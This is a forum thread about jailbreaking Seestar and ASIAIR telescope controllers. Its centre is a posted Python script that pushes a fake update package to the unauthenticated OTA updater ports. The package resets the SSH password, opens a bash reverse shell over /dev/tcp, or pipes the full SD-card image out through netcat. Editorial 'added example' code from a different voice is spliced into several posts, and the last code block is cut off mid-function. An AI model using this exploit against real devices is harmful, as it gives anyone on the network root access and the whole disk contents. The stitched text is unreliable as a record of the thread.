Seestar S50/ASIAIR Jailbreak + SSH

Software
186 replies to this topic

#51 skysurfer

    Surveyor 1

  • Posts: 1,560
  • Joined: 05 Oct 2009
  • Loc: N 52 E 6

Posted 11 January 2024 - 01:26 PM

Command run
So easy to root a device now! Very well done! Can we look at adding this code to GitHub?

This ?

https://github.com/open-astro/linux



#52 mconsidine

    Explorer 1

  • Posts: 96
  • Joined: 16 Nov 2006

Posted 11 January 2024 - 01:38 PM

 

Then, could you connect to it and jailbreak it?

Nope, not yet.  I'm not sure if it's well locked down, or I'm an idiot, or both.  I hope joshumax can chime in.  nmap shows info like this:

22/tcp   open  ssh           OpenSSH 7.9p1 Raspbian 10+deb10u2 (protocol 2.0)

139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1935/tcp open  rtmp
4030/tcp open  jdmn-port
4040/tcp open  yo-main
4350/tcp open  net-device
4361/tcp open  nacnl
4400/tcp open  ds-srv
4500/tcp open  sae-urn
4700/tcp open  netxms-agent
4701/tcp open  netxms-mgmt
4800/tcp open  iims
4801/tcp open  iwec

 

as well as ssh-hostkey for 22

Looks like 139 and 445 are related to Samba shares (workgroup: WORKGROUP)

mconsidine

EDIT:  this came up later when running nmap with sudo:

4030/tcp open  napster       WinMX or Lopster Napster P2P client

Dunno if that's some sort of false positive, but the thing does have a speaker :)


Edited by mconsidine, 11 January 2024 - 02:29 PM.


#53 joeytroy

    Viking 1

  • Posts: 765
  • Joined: 14 Aug 2020
  • Loc: Belen, NM, USA

Posted 11 January 2024 - 01:52 PM

I was talking about the python script in the first post, if we could add it to GitHub. That repository you listed is my development repository for OpenAstro. The linux folder is the kernel I made for the ASIAIR Plus RPi version, which supports both a 32-bit and 64-bit operating system; the kernel supports the USB ports, as they do not work right out of the box. I don't mind adding this into the OpenAstro GitHub, but since it's not my code I didn't want to assume I could just upload it.



#54 mconsidine

    Explorer 1

  • Posts: 96
  • Joined: 16 Nov 2006

Posted 11 January 2024 - 02:59 PM

I decided to give the original code a shot.

... and we're in it seems!

Attached Thumbnails

  • Screenshot from 2024-01-11 14-57-50.png


#55 mconsidine

    Explorer 1

  • Posts: 96
  • Joined: 16 Nov 2006

Posted 11 January 2024 - 03:01 PM

Output of ls ...

Attached Thumbnails

  • Screenshot from 2024-01-11 15-00-01.png


#56 skysurfer

    Surveyor 1

  • Posts: 1,560
  • Joined: 05 Oct 2009
  • Loc: N 52 E 6

Posted 11 January 2024 - 03:05 PM

I decided to give the original code a shot.

... and we're in it seems!

Linux SeeStar 4.19.111 #2 SMP PREEMPT Thu Aug 31 13:55:30 CST 2023 armv7l

Does it still run 32-bit?



#57 Artimon

    Sputnik

  • Posts: 33
  • Joined: 07 Dec 2023

Posted 11 January 2024 - 03:59 PM

Output of ls ...

Great !!

On my side, I get much the same, except the zipped file (in red) is missing.

Attached Thumbnails

  • Capture3.JPG
  • Capture4.JPG

Edited by Artimon, 11 January 2024 - 04:01 PM.


#58 Artimon

    Sputnik

  • Posts: 33
  • Joined: 07 Dec 2023

Posted 11 January 2024 - 04:12 PM

Here is the content of the Seestar:

Attached Thumbnails

  • Capture5.JPG


#59 mconsidine

    Explorer 1

  • Posts: 96
  • Joined: 16 Nov 2006

Posted 11 January 2024 - 04:38 PM

Looks like you modified the .py program  that has the --backup option?  If so, could you post?  Dunno why mine didn't work originally.

mconsidine



#60 Artimon

    Sputnik

  • Posts: 33
  • Joined: 07 Dec 2023

Posted 11 January 2024 - 04:39 PM

Looks like you modified the .py program  that has the --backup option?  If so, could you post?  Dunno why mine didn't work originally.

mconsidine



#61 Artimon

    Sputnik

  • Posts: 33
  • Joined: 07 Dec 2023

Posted 11 January 2024 - 04:40 PM

Here you are (it's from a former post):

# Seestar/ASIAIR jailbreak by @joshumax
# Licensed in the public domain
# Source Thread: https://www.cloudyni...-jailbreak-ssh/
# Mod by Oxofrimbl to handle different ports and added a backup and reverse shell option without modifying the ASIAIR
# Needs Python 3.9+ (argparse.BooleanOptionalAction)

import argparse
import hashlib
import os
import socket
import sys
import tarfile
import tempfile

JAILBREAK_FILE = 'jailbreak.tar.bz2'

# Runs on the device as the fake "update": remount root rw, set pi's password, remount ro
JAILBREAK_SCRIPT = """
sudo mount -o remount,rw /

echo "pi:raspberry" | sudo chpasswd
sync

sudo mount -o remount,ro /
"""

def recv_all(sock):
    """Read from the command socket until a newline-terminated reply or EOF."""
    data = b''

    while True:
        chunk = sock.recv(1024)
        if not chunk:
            break
        data += chunk
        if data.endswith(b'\n'):
            break

    return data.decode(errors='replace')

def begin_update(address, file):
    s = socket.socket()      # OTA command socket (JSON-RPC)
    s_ota = socket.socket()  # OTA binary socket (raw archive bytes)

    with open(file, 'rb') as fh:
        file_contents = fh.read()
    fsize = os.path.getsize(file)
    fmd5 = hashlib.md5(file_contents).hexdigest()
    # The updater expects file_len and md5 to match what arrives on the binary socket
    json_str = '{{"id":1,"method":"begin_recv","params":[{{"file_len":{file_len},"file_name":"air","run_update":true,"md5":"{md5}"}}]}}\r\n'
    json_str = json_str.format(file_len = fsize, md5 = fmd5)

    # Connect to OTA file socket first
    try:
        print("Try to connect to binary port 4361 (legacy?)")
        s_ota.connect((address, 4361))
    except ConnectionRefusedError:
        try:
            print("Connection to 4361 failed, try to connect to binary port 4360 (new?)")
            s_ota.connect((address, 4360))
        except ConnectionRefusedError:
            print("Cannot connect to binary port")
            sys.exit(-2)

    # Then connect to OTA command socket
    s.connect((address, 4350))

    print('Got: ' + recv_all(s))

    print('Sending RPC: {rpc}'.format(rpc = json_str))
    s.sendall(json_str.encode())

    print('Got back: ' + recv_all(s))

    # Stream the archive; the device checks length and md5 against the RPC
    s_ota.sendall(file_contents)

    s_ota.close()
    s.close()

def create_patch(script_content=""):
    """Wrap script_content as update_package.sh inside a fake tar.bz2 update package."""
    with tempfile.NamedTemporaryFile(mode='w+b', delete=False) as tf:
        tf.write(b'#!/bin/bash\n')
        tf.write(script_content.encode('UTF-8'))
    try:
        with tarfile.open(JAILBREAK_FILE, "w:bz2") as tarhandle:
            tarhandle.add(tf.name, "update_package.sh")
    finally:
        os.unlink(tf.name)  # don't leave the payload lying around in /tmp

if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument('--ip', required=True, help="Set the ASIAIR/Seestar IP")
    # Best-effort guess of this host's address; override with --client-ip if it resolves to 127.x
    hostname = socket.gethostname()
    client_ip_address = socket.gethostbyname(hostname)

    parser.add_argument('--client-ip', help="Client IP in case this client doesn't serve as 'master'", default=client_ip_address)
    parser.add_argument('--shell', help="Get a reverse shell to the client IP; on the client run 'nc -l 4242'", action=argparse.BooleanOptionalAction)
    parser.add_argument('--backup', help="Stream a full SD-card image to the client IP; on the client run 'nc -l 4444 | dd of=asiair.img'", action=argparse.BooleanOptionalAction)
    parser.add_argument('--jailbreak', help="Perform a jailbreak by setting the ssh username:password to pi:raspberry", action=argparse.BooleanOptionalAction)
    args = parser.parse_args()
    client_ip_address = args.client_ip

    if not (args.jailbreak or args.backup or args.shell):
        print("Please use -h; either perform a jailbreak (rooting device), backup the full image to a TCP port, or get a reverse shell to a target IP")
        sys.exit(-1)

    if args.shell:
        create_patch(f"bash -i >& /dev/tcp/{client_ip_address}/4242 0>&1")
        begin_update(args.ip, JAILBREAK_FILE)

    if args.backup:
        create_patch(f"sudo dd if=/dev/mmcblk0 bs=1M | nc {client_ip_address} 4444")
        begin_update(args.ip, JAILBREAK_FILE)

    if args.jailbreak:
        create_patch(JAILBREAK_SCRIPT)
        begin_update(args.ip, JAILBREAK_FILE)

 

 


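The script above talks to the updater in two steps: a begin_recv JSON-RPC line on the command port (4350) announcing file_len and md5, then the raw tar.bz2 on the binary port (4360/4361). The following is an added example, not code from the thread, from joshumax/Oxofrimbl, or from ZWO: it rebuilds the client side with proper line-framed reads and an in-memory archive, and pairs it with a mock of the device side on localhost so the whole exchange can be run offline. The device side is an assumption inferred only from the fields the client sends (a banner on connect, an ack after begin_recv, a length and MD5 check on the binary stream, then a look inside the archive for update_package.sh); a real unit may behave differently, and this code never contacts one.

```python
import hashlib
import io
import json
import socket
import tarfile
import threading


def build_update_package(script_body: str) -> bytes:
    """Build the archive the posted script sends: a tar.bz2 whose single
    member is update_package.sh, assembled in memory (nothing left in /tmp)."""
    payload = ("#!/bin/bash\n" + script_body).encode()
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:bz2") as tar:
        info = tarfile.TarInfo("update_package.sh")
        info.size = len(payload)
        info.mode = 0o755
        tar.addfile(info, io.BytesIO(payload))
    return buf.getvalue()


def begin_recv_rpc(blob: bytes, rpc_id: int = 1) -> bytes:
    """Same begin_recv request as the posted script, via json.dumps not str.format."""
    req = {"id": rpc_id, "method": "begin_recv",
           "params": [{"file_len": len(blob), "file_name": "air",
                       "run_update": True, "md5": hashlib.md5(blob).hexdigest()}]}
    return (json.dumps(req, separators=(",", ":")) + "\r\n").encode()


def recv_line(sock: socket.socket) -> bytes:
    """Read up to and including the first newline (or EOF)."""
    buf = bytearray()
    while not buf.endswith(b"\n"):
        chunk = sock.recv(1024)
        if not chunk:
            break
        buf += chunk
    return bytes(buf)


def recv_exact(sock: socket.socket, n: int) -> bytes:
    """Read exactly n bytes; a short read means the sender went away."""
    buf = bytearray()
    while len(buf) < n:
        chunk = sock.recv(min(65536, n - len(buf)))
        if not chunk:
            raise ConnectionError(f"binary stream ended after {len(buf)} of {n} bytes")
        buf += chunk
    return bytes(buf)


class MockUpdater:
    """ASSUMED device side, on ephemeral localhost ports instead of 4350/4360:
    accept binary then command connection, send a banner, ack begin_recv,
    read file_len bytes, verify MD5, then list the archive members."""

    def __init__(self):
        self.cmd_srv, self.bin_srv = socket.socket(), socket.socket()
        for srv in (self.cmd_srv, self.bin_srv):
            srv.bind(("127.0.0.1", 0))
            srv.listen(1)
            srv.settimeout(10)
        self.cmd_port = self.cmd_srv.getsockname()[1]
        self.bin_port = self.bin_srv.getsockname()[1]
        self.result = {}
        self.thread = threading.Thread(target=self._serve, daemon=True)
        self.thread.start()

    def _serve(self):
        bconn, _ = self.bin_srv.accept()
        cconn, _ = self.cmd_srv.accept()
        with bconn, cconn:
            bconn.settimeout(10)
            cconn.settimeout(10)
            cconn.sendall(b'{"Event":"Hello"}\r\n')  # banner: assumed, not observed
            req = json.loads(recv_line(cconn))
            params = req["params"][0]
            cconn.sendall(json.dumps({"id": req["id"], "code": 0}).encode() + b"\r\n")
            blob = recv_exact(bconn, params["file_len"])
            ok = hashlib.md5(blob).hexdigest() == params["md5"]
            members = []
            if ok:  # only trust the archive once the declared digest matches
                with tarfile.open(fileobj=io.BytesIO(blob), mode="r:bz2") as tar:
                    members = tar.getnames()
            self.result = {"md5_ok": ok, "members": members, "run_update": params["run_update"]}
        self.cmd_srv.close()
        self.bin_srv.close()


def push_update(address: str, cmd_port: int, bin_port: int, blob: bytes, rpc: bytes) -> dict:
    """Client side in the posted begin_update() order: binary socket first,
    then command socket, banner, RPC, reply, and only then the raw bytes."""
    with socket.create_connection((address, bin_port), timeout=10) as s_ota, \
         socket.create_connection((address, cmd_port), timeout=10) as s:
        recv_line(s)  # banner
        s.sendall(rpc)
        reply = json.loads(recv_line(s))
        s_ota.sendall(blob)
    return reply


def run(tamper: bool = False) -> dict:
    """Push a jailbreak-style package to the mock; with tamper=True one byte is
    flipped after the RPC was built, so the declared MD5 no longer matches."""
    blob = build_update_package('echo "pi:raspberry" | sudo chpasswd\n')
    rpc = begin_recv_rpc(blob)
    if tamper:
        blob = blob[:-1] + bytes([blob[-1] ^ 0x01])
    dev = MockUpdater()
    reply = push_update("127.0.0.1", dev.cmd_port, dev.bin_port, blob, rpc)
    dev.thread.join(timeout=10)
    return {"reply": reply, **dev.result}


if __name__ == "__main__":
    print(run())
    print(run(tamper=True))
```

The two reads, recv_line and recv_exact, are the point: the posted recv_all stops as soon as a chunk happens to end in a newline and never frames the binary side at all, so a message split across recv() calls is silently truncated. Whether the real updater verifies the MD5 before running update_package.sh is exactly what a mock cannot tell you; on a real unit, the answer to that question is the answer to whether anyone on the same Wi-Fi can push code to it.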

#62 mconsidine

    Explorer 1

  • Posts: 96
  • Joined: 16 Nov 2006

Posted 11 January 2024 - 05:11 PM

Thanks.  I had that and have no idea why it didn't work the first time.    Oh well ...



#63 mconsidine

    Explorer 1

  • Posts: 96
  • Joined: 16 Nov 2006

Posted 11 January 2024 - 05:39 PM

Looks like a couple of the ports are used for communicating with the motors and guider, based on some logs I found. 'Course, since I have only clouds I can't test anything. But it wouldn't surprise me if the focuser and filter have their own ports too.

#64 joeytroy

    Viking 1

  • Posts: 765
  • Joined: 14 Aug 2020
  • Loc: Belen, NM, USA

Posted 11 January 2024 - 06:02 PM

Looks like a couple of the ports are used for communicating with the motors and guider, based on some logs I found. 'Course, since I have only clouds I can't test anything. But it wouldn't surprise me if the focuser and filter have their own ports too.

You are 100% correct. Once you root and get SSH you can run the following command and see the guider or imager tied to ports. This is from the ASIAIR Pro; the pigpiod is for the power ports.

root@asiair:~# sudo netstat -tulpn | grep LISTEN
tcp        0      0 0.0.0.0:4040            0.0.0.0:*               LISTEN      766/zwoair_guider
tcp        0      0 0.0.0.0:4360            0.0.0.0:*               LISTEN      581/zwoair_updater
tcp        0      0 0.0.0.0:139             0.0.0.0:*               LISTEN      1346/smbd
tcp        0      0 0.0.0.0:4400            0.0.0.0:*               LISTEN      766/zwoair_guider
tcp        0      0 0.0.0.0:4500            0.0.0.0:*               LISTEN      766/zwoair_guider
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      420/sshd
tcp        0      0 0.0.0.0:8888            0.0.0.0:*               LISTEN      756/pigpiod
tcp        0      0 0.0.0.0:4700            0.0.0.0:*               LISTEN      786/zwoair_imager
tcp        0      0 0.0.0.0:445             0.0.0.0:*               LISTEN      1346/smbd
tcp        0      0 0.0.0.0:4030            0.0.0.0:*               LISTEN      766/zwoair_guider
tcp        0      0 0.0.0.0:4350            0.0.0.0:*               LISTEN      581/zwoair_updater
tcp        0      0 0.0.0.0:4800            0.0.0.0:*               LISTEN      786/zwoair_imager
tcp        0      0 0.0.0.0:4801            0.0.0.0:*               LISTEN      786/zwoair_imager
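
nmap's service column without -sV is only a lookup of the port number in its nmap-services table, which is why 4030 shows up as "jdmn-port" in one scan and "napster" in another; the netstat output from the device itself is the authoritative map. As an added example, not code from the thread, the following joins the two listings by port so the nmap guess sits next to the process that really owns the socket. The sample lines are constructed from this page: mconsidine's nmap scan is of a Seestar and joeytroy's netstat is from an ASIAIR Pro, so the unmatched ports it reports reflect that mismatch as much as anything; run both against the same unit for a real inventory.

```python
import re

# Sample lines constructed from the thread: mconsidine's nmap output (Seestar)
# and joeytroy's netstat output (ASIAIR Pro). Different units, joined here only
# to show the technique.
NMAP_SAMPLE = """\
22/tcp   open  ssh           OpenSSH 7.9p1 Raspbian 10+deb10u2 (protocol 2.0)
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1935/tcp open  rtmp
4030/tcp open  jdmn-port
4040/tcp open  yo-main
4350/tcp open  net-device
4361/tcp open  nacnl
4400/tcp open  ds-srv
4500/tcp open  sae-urn
4700/tcp open  netxms-agent
4701/tcp open  netxms-mgmt
4800/tcp open  iims
4801/tcp open  iwec
"""

NETSTAT_SAMPLE = """\
tcp        0      0 0.0.0.0:4040            0.0.0.0:*               LISTEN      766/zwoair_guider
tcp        0      0 0.0.0.0:4360            0.0.0.0:*               LISTEN      581/zwoair_updater
tcp        0      0 0.0.0.0:139             0.0.0.0:*               LISTEN      1346/smbd
tcp        0      0 0.0.0.0:4400            0.0.0.0:*               LISTEN      766/zwoair_guider
tcp        0      0 0.0.0.0:4500            0.0.0.0:*               LISTEN      766/zwoair_guider
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      420/sshd
tcp        0      0 0.0.0.0:8888            0.0.0.0:*               LISTEN      756/pigpiod
tcp        0      0 0.0.0.0:4700            0.0.0.0:*               LISTEN      786/zwoair_imager
tcp        0      0 0.0.0.0:445             0.0.0.0:*               LISTEN      1346/smbd
tcp        0      0 0.0.0.0:4030            0.0.0.0:*               LISTEN      766/zwoair_guider
tcp        0      0 0.0.0.0:4350            0.0.0.0:*               LISTEN      581/zwoair_updater
tcp        0      0 0.0.0.0:4800            0.0.0.0:*               LISTEN      786/zwoair_imager
tcp        0      0 0.0.0.0:4801            0.0.0.0:*               LISTEN      786/zwoair_imager
"""

# "22/tcp   open  ssh   OpenSSH 7.9p1 ..."; the version text exists only when -sV probed the port
NMAP_RE = re.compile(r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)"
                     r"(?:\s+(?P<version>.*\S))?\s*$")
# "tcp  0  0 0.0.0.0:4040  0.0.0.0:*  LISTEN  766/zwoair_guider"; pid/proc is "-" without root
NETSTAT_RE = re.compile(r"^(?P<proto>tcp6?|udp6?)\s+\d+\s+\d+\s+(?P<addr>\S+):(?P<port>\d+)\s+\S+"
                        r"\s+LISTEN\s+(?P<pid>\d+|-)(?:/(?P<proc>\S+))?")


def parse_nmap(text: str) -> dict:
    """port -> {service, version} for open ports; service is nmap's name guess."""
    out = {}
    for line in text.splitlines():
        m = NMAP_RE.match(line.strip())
        if m and m["state"] == "open":
            out[int(m["port"])] = {"service": m["service"], "version": m["version"] or ""}
    return out


def parse_netstat(text: str) -> dict:
    """port -> {bind, pid, proc} for LISTEN sockets; proc is what is really bound."""
    out = {}
    for line in text.splitlines():
        m = NETSTAT_RE.match(line.strip())
        if m:
            out[int(m["port"])] = {"bind": m["addr"], "pid": m["pid"], "proc": m["proc"] or "?"}
    return out


def reconcile(nmap: dict, netstat: dict) -> list:
    """One row per port seen by either tool. 'fingerprinted' is True only when
    nmap actually probed the service (-sV) rather than looked the number up."""
    rows = []
    for port in sorted(set(nmap) | set(netstat)):
        n, s = nmap.get(port), netstat.get(port)
        rows.append({"port": port,
                     "nmap_guess": n["service"] if n else None,
                     "fingerprinted": bool(n and n["version"]),
                     "process": s["proc"] if s else None,
                     "bind": s["bind"] if s else None})
    return rows


def listening_but_unscanned(rows: list) -> list:
    """Listeners the scan never reported (outside nmap's default port list, or another unit)."""
    return [r["port"] for r in rows if r["process"] and r["nmap_guess"] is None]


def scanned_but_no_listener(rows: list) -> list:
    """Ports nmap saw open with no matching LISTEN socket (here: the two units differ)."""
    return [r["port"] for r in rows if r["nmap_guess"] and r["process"] is None]


def by_process(rows: list) -> dict:
    """Group ports by owning process, e.g. zwoair_updater -> [4350, 4360]."""
    groups = {}
    for r in rows:
        if r["process"]:
            groups.setdefault(r["process"], []).append(r["port"])
    return groups


if __name__ == "__main__":
    rows = reconcile(parse_nmap(NMAP_SAMPLE), parse_netstat(NETSTAT_SAMPLE))
    for r in rows:
        print(f'{r["port"]:>5}  nmap={str(r["nmap_guess"]):<14} proc={r["process"]}  bind={r["bind"]}')
    print("unscanned listeners:", listening_but_unscanned(rows))
    print("open but no listener:", scanned_but_no_listener(rows))
```

Two things the merged table makes obvious that neither listing does alone: every service is bound to 0.0.0.0, so the updater pair is reachable from whatever network the device joins, not just its own hotspot; and only port 22 was actually fingerprinted, so every other nmap name is a table lookup and should not be read as evidence of what is running.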


#65 Artimon

    Sputnik

  • Posts: 33
  • Joined: 07 Dec 2023

Posted 12 January 2024 - 06:46 AM

 

You are 100% correct. Once you root and get SSH you can run the following command and see the guider or imager tied to ports. This is from the ASIAIR Pro; the pigpiod is for the power ports.

[netstat listing quoted from #64]

And for the Seestar S50. So the entry points are indeed the "updater" ports in both cases, as the other ports are used by the system imager/guider.

Attached Thumbnails

  • Capture6.JPG

Edited by Artimon, 12 January 2024 - 06:49 AM.


#66 Artimon

    Sputnik

  • Posts: 33
  • Joined: 07 Dec 2023

Posted 12 January 2024 - 07:21 AM

Output of ls ...

Would it be possible for you to save then share the zip file zwoasi_factory_v1.5.7_2023-11-6_10-34-27.zip ? Should be interesting to see inside ... Tkx in advance! SteF.

Attached Thumbnails

  • post-20216-0-29960600-1705003229.png

Edited by Artimon, 12 January 2024 - 07:22 AM.


#67 mconsidine

    Explorer 1

  • Posts: 96
  • Joined: 16 Nov 2006

Posted 12 January 2024 - 07:31 AM

So a pair for the updater that would be send/receive, essentially. Then two pairs for "imager" and two for "guider".

I know that 4030 works as the port for it in skysafari from my own setup. I wonder if the motors, camera, focuser and filter each have pairs.

I'll try a test today of logging the traffic while moving the scope, taking a picture and imaging. I found logs showing that activity earlier but didn't parse them, thinking they were related to what-i-thought-were failing ssh attempts.

It's still not clear to me why the "hidden menu" material wouldn't have been in the version of the app running around at that time. I understand it was firmware earlier than 1.9.1, but does anyone know what the app version was?

EDIT: also, what were the drop dates on the firmware and app that removed the hidden menu?

Edited by mconsidine, 12 January 2024 - 07:39 AM.


#68 mconsidine

    Explorer 1

  • Posts: 96
  • Joined: 16 Nov 2006

Posted 12 January 2024 - 07:35 AM

Yes, I can at least provide a listing. I recall it was just a copy of other items in that folder. There are also two other zips, under /etc/zwo. Which is where the esptool stuff is.

#69 Artimon

    Sputnik

  • Posts: 33
  • Joined: 07 Dec 2023

Posted 12 January 2024 - 08:38 AM

Yes, I can at least provide a listing. I recall it was just a copy of other items in that folder. There are also two other zips, under /etc/zwo. Which is where the esptool stuff is.

Yes, I saw those ones.

I wonder where it would be possible to change the gain value. I saw in the dark frames in the home/.ZWO/darklibrary/ FITS files that the gain value is 80. I would like to test other values from this sheet:

Attached Thumbnails

  • Mars-C-IMX462-gain-full-well-dynamic-range-dead-noise.jpg


#70 mconsidine

    Explorer 1

  • Posts: 96
  • Joined: 16 Nov 2006

Posted 12 January 2024 - 09:06 AM

Going on a hunch here ... I came across a big XML file specific to the sensor. A quick scroll through it showed a number of settings. I bet it reads that to initialize. Maybe check that?

#71 kaicyung

    Explorer 1

  • Posts: 78
  • Joined: 27 Jul 2016

Posted 12 January 2024 - 09:20 AM

Going on a hunch here ... I came across an big XML file specific to the sensor. A quick scroll through it showed a number of settings. I bet it reads that to initialize. Maybe check that?

For Seestar? Where do you think it is stored in its filesystem? I can't seem to find that xml specific to the sensor.



#72 mconsidine

    Explorer 1

  • Posts: 96
  • Joined: 16 Nov 2006

Posted 12 January 2024 - 09:33 AM

Check

  /home/pi/svr_log_bk

to see if you have files like "log_guider.txt" and "log_imager.txt".  They may also be incremented, e.g. "log_guider-2.txt".

Those seem to show comms with the respective hw on those ports.  E.g. from guider log:

1-11_15:10:36.463029 [write_port](tty_write):GAT#
1-11_15:10:36.518520 [ReadCom]e5#
1-11_15:10:36.519194 [do_notify1]<-4400(237):{"jsonrpc":"2.0","Timestamp":"39.554370709","method":"scope_get_equ_coord","result":{"ra":10.721389,"dec":-43.850000},"code":0,"id":15}
1-11_15:10:41.606187 [handle_cli_input_event]->4400:{"id":18,"method":"scope_get_equ_coord"}
1-11_15:10:41.606503 [write_port](tty_write):GR#
1-11_15:10:41.664102 [ReadCom]10:43:22#
1-11_15:10:41.665171 [write_port](tty_write):GD#:GFR2#:GFD2#
1-11_15:10:41.722899 [ReadCom]-43*51:00#
1-11_15:10:41.726824 [ReadCom]0#
1-11_15:10:41.732536 [ReadCom]-1841152#
1-11_15:10:41.732828 [write_port](tty_write):GU

From imager log:

1-11_15:11:29.926410 [CTrackStateChecker]track=0
1-11_15:11:29.926588 [RegEvent]>ScopeTrack
1-11_15:11:29.926744 [RegEvent]init key ScopeTrack
1-11_15:11:29.926864 [RegEvent]set func pointer
1-11_15:11:29.927011 [startTimer]timer 93b01e38 start
1-11_15:11:29.927092 [SetControlVal]Red: 141
1-11_15:11:29.927256 [ASICAM_SetRawGain]r=141
1-11_15:11:29.927328 [SetControlVal]Blue: 141
1-11_15:11:29.927398 [ASICAM_SetRawGain]b=141
1-11_15:11:29.927540 [RtmpFunc]set bin: 1
1-11_15:11:29.927650 [RtmpFunc]set subframe: 1080x1920
1-11_15:11:29.927978 [SetCamSubframe]bin1, 1920 x 1080, (0, 0)
1-11_15:11:29.928056 [ResetAll]>
1-11_15:11:29.928229 [ResetAll]<
1-11_15:11:29.928300 [RtmpFunc]exp = 500ms, FPS from exp = 2
1-11_15:11:29.928387 [RtmpFunc]Planet Correction disabled
1-11_15:11:29.928451 [RtspFunc]thread start
1-11_15:11:29.928529 [RtspFunc]1080 x 1920, (0, 0)

1-11_15:11:36.055786 [WaitReq]key ScopeGoto is exist
1-11_15:11:36.214239 [TempChange]pi temp: 50.7->52.5
1-11_15:11:36.218401 [do_notify]<-{"Event":"PiStatus","Timestamp":"99.491132763","temp":52.500000}
1-11_15:11:36.622287 [AddOne]capture FPS = 11.9946
1-11_15:11:36.668791 [AddOne]test_connection 4800 FPS = 0.215381
1-11_15:11:37.056082 [WaitReq]key ScopeGoto: response is empty
1-11_15:11:37.056192 [WaitReq]>ScopeGoto, 1000ms
1-11_15:11:37.056233 [WaitReq]key ScopeGoto is exist
1-11_15:11:38.056455 [WaitReq]key ScopeGoto: response is empty

1-11_15:11:39.934880 [WaitReq]< {"jsonrpc":"2.0","Timestamp":"102.962355359","method":"scope_get_equ_coord","result":{"ra":6.263889,"dec":-58.584722},"code":0,"id":55}
1-11_15:11:39.935088 [do_notify1]<-4700(255):{"jsonrpc":"2.0","Timestamp":"102.962355359","method":"scope_get_equ_coord","result":{"ra":6.263889,"dec":-58.584722},"code":0,"id":55}

I also note the following:

/home/pi/.ZWO/ASIAIR_guider.xml
/home/pi/.ZWO/ASIAIR_imager.xml
/home/pi/.ZWO/ASIAIR_general.xml
/home/pi/.ZWO/eaf.xml
/etc/iqfiles/imx462_CMK-OT1234-FV0_M00-2MP-F00.xml
/etc/zwo/imx462_CMK-OT1234-FV0_M00-2MP-F00.xml.0
/etc/zwo/imx462_CMK-OT1234-FV0_M00-2MP-F00.xml.180
/etc/zwo/imx462_CMK-OT1234-FV0_M00-2MP-F00.xml
/oem/etc/iqfiles/imx462_CMK-OT1234-FV0_M00-2MP-F00.xml

Admittedly, though, I haven't explored the content.
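
The guider log interleaves three things: JSON-RPC requests arriving on port 4400 (->4400:), the replies and notifications sent back (<-4400(...):), and the serial traffic to the mount in between (tty_write / ReadCom, with LX200-style :GR#, :GD# commands). As an added example, not part of mconsidine's post or of any ZWO tooling, here is a parser that pairs requests with responses by id and port, measures the round trip, and attaches the serial commands issued while the request was outstanding. The reading of -> as inbound request and <- as outbound reply is an inference from the lines above; the number in parentheses after <-4400 is kept as an opaque frame field (it is not the JSON length). The sample is the page's own lines plus one constructed reply for id 18, marked in the code, so there is something to pair.

```python
import json
import re
from datetime import datetime

LINE_RE = re.compile(r"^(?P<ts>\d{1,2}-\d{1,2}_\d{2}:\d{2}:\d{2}\.\d{6}) \[(?P<tag>[^\]]+)\](?P<rest>.*)$")
REQ_RE = re.compile(r"^->(?P<port>\d+):(?P<json>\{.*\})$")                    # inbound JSON-RPC request
RESP_RE = re.compile(r"^<-(?P<port>\d+)\((?P<frame>\d+)\):(?P<json>\{.*\})$")  # outbound reply/notification
TTY_RE = re.compile(r"^\(tty_write\)(?P<cmd>.*)$")                            # serial write to the mount

# mconsidine's guider log lines from the post above, plus ONE CONSTRUCTED line
# at the end (the id 18 reply) so the request/response pairing has a match.
SAMPLE = """\
1-11_15:10:36.463029 [write_port](tty_write):GAT#
1-11_15:10:36.518520 [ReadCom]e5#
1-11_15:10:36.519194 [do_notify1]<-4400(237):{"jsonrpc":"2.0","Timestamp":"39.554370709","method":"scope_get_equ_coord","result":{"ra":10.721389,"dec":-43.850000},"code":0,"id":15}
1-11_15:10:41.606187 [handle_cli_input_event]->4400:{"id":18,"method":"scope_get_equ_coord"}
1-11_15:10:41.606503 [write_port](tty_write):GR#
1-11_15:10:41.664102 [ReadCom]10:43:22#
1-11_15:10:41.665171 [write_port](tty_write):GD#:GFR2#:GFD2#
1-11_15:10:41.722899 [ReadCom]-43*51:00#
1-11_15:10:41.726824 [ReadCom]0#
1-11_15:10:41.732536 [ReadCom]-1841152#
1-11_15:10:41.732828 [write_port](tty_write):GU
1-11_15:10:41.734000 [do_notify1]<-4400(237):{"jsonrpc":"2.0","Timestamp":"44.769000000","method":"scope_get_equ_coord","result":{"ra":10.722778,"dec":-43.850000},"code":0,"id":18}
"""


def parse_ts(s: str) -> datetime:
    """Stamps are month-day_H:M:S.micro with no year; fine for computing deltas."""
    return datetime.strptime(s, "%m-%d_%H:%M:%S.%f")


def parse_line(line: str):
    """Classify one log line; None for lines not in the log format."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ev = {"ts": parse_ts(m["ts"]), "tag": m["tag"]}
    rest = m["rest"]
    if (r := REQ_RE.match(rest)):
        ev.update(kind="request", port=int(r["port"]), msg=json.loads(r["json"]))
    elif (r := RESP_RE.match(rest)):
        ev.update(kind="response", port=int(r["port"]), frame=int(r["frame"]), msg=json.loads(r["json"]))
    elif (r := TTY_RE.match(rest)):
        # ":GD#:GFR2#:GFD2#" carries several colon-prefixed LX200-style commands in one write
        ev.update(kind="tty_write", cmds=[c for c in r["cmd"].split(":") if c])
    elif m["tag"] == "ReadCom":
        ev.update(kind="tty_read", data=rest)
    else:
        ev.update(kind="other", data=rest)
    return ev


def correlate(text: str) -> dict:
    """Pair each request with the response of the same id on the same port and
    record the round trip plus the serial traffic issued while it was pending.
    Replies with no pending request are orphans (notifications, or the log
    started mid-exchange); requests never answered are reported as well."""
    pending, pairs, orphans = {}, [], []
    for e in filter(None, (parse_line(line) for line in text.splitlines())):
        if e["kind"] == "request":
            pending[(e["port"], e["msg"]["id"])] = {"req": e, "serial": []}
        elif e["kind"] in ("tty_write", "tty_read"):
            for p in pending.values():
                p["serial"].append(e)
        elif e["kind"] == "response":
            key = (e["port"], e["msg"].get("id"))
            p = pending.pop(key, None)
            if p is None:
                orphans.append(e["msg"])
                continue
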